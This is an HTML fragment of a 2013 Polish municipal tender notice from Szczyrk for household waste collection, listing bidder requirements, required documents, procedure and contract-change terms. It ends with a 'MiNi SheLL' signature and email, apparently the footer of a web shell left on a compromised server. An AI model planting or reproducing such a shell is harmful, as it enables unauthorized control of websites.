<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże:
Posiadanie wiedzy i doświadczenia w zakresie odpowiadającym  przedmiotowi zamówienia tj.: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie wykonał lub wykonuje usługi odbierania odpadów  komunalnych z nieruchomości o masie łącznej odebranych odpadów  komunalnych  w ciągu następujących po sobie 12 miesięcy co najmniej 1 000 Mg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże dysponowanie:
co najmniej następującym sprzętem i wyposażeniem do realizacji niniejszego zamówienia: 
a)minimum 1 hakowcem - przystosowanym do przewozu średniej wielkości kontenerów o pojemności min. 7m3,
b)minimum   2   pojazdy   specjalne  z   zabudową   bezpyłową   (tzw.   śmieciarka   mała),   każdy o pojemności skrzyni ładunkowej 6-12 m3,
c)minimum 1 pojazd skrzyniowy z napędem na cztery koła z możliwością mechanicznego wyładunku odpadów  oraz zabezpieczeniem przed wysypywaniem się odpadów o ładowności ponad  3,5 t,
d)minimum 3 pojazdy z zabudowaną przestrzenią ładunkową z napędem na cztery koła o ładowności do  3,5 t ,
e)minimum 5 szt. kontenerów typu KP 7,
f)bazą magazynowo-transportową - położoną na terenie gminy lub w odległości nie większej niż 60 km od granicy gminy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia udokumentują wykaże:  
a) dostęp do  środków finansowych niezbędnych na realizację zamówienia na kwotę co najmniej 300.000,00 zł .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie w trybie art.44 oraz Oświadczenie w trybie art.26 ust.2b w związku z art.22 Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy przy zaistnieniu okoliczności nie zależnych od stron umowy,  w zakresie  wynagrodzenia :
a)zmiany wysokości  opłat wynikających wprost z przepisów prawa, a mających istotny wpływ na koszty świadczenia usługi;
b)innej zmiany prawa powszechnie obowiązującego wpływającej na zasady odbierani i zagospodarowania odpadów;
c)odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych, 
2. W związku z wskazanymi w ust. 2 okolicznościami dopuszczalne jest zmniejszenie lub zwiększenie wynagrodzenia, przy czym zwiększenie wynagrodzenia dopuszczalne jest o kwotę nie większą niż udokumentowany wzrost kosztów świadczenia usługi. 
3. Zamawiający przewiduje możliwość zmiany umowy przy zaistnieniu okoliczności nie zależnych od stron umowy,   w zakresie :
a) zmian Harmonogramu odbioru odpadów komunalnych,
b) opóźnienia  w  rozpoczęciu  i  zakończeniu  wykonywania  umowy,
c) wystąpienia siły wyższej,
4. Dopuszcza się zmianę umowy w zakresie sposobu spełniania przez Wykonawcę świadczenia odbierania i zagospodarowania odpadów w przypadku zmiany przepisów prawa powszechnie obowiązującego wpływających na sposób spełnienia świadczenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.szczyrk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szczyrku 
ul. Beskidzka 4
43-370 Szczyrk 
Pok. nr 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 10:00, miejsce: Urząd Miejski w Szczyrku 
ul. Beskidzka 4
43-370 Szczyrk 
Dziennik Podawczy Pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com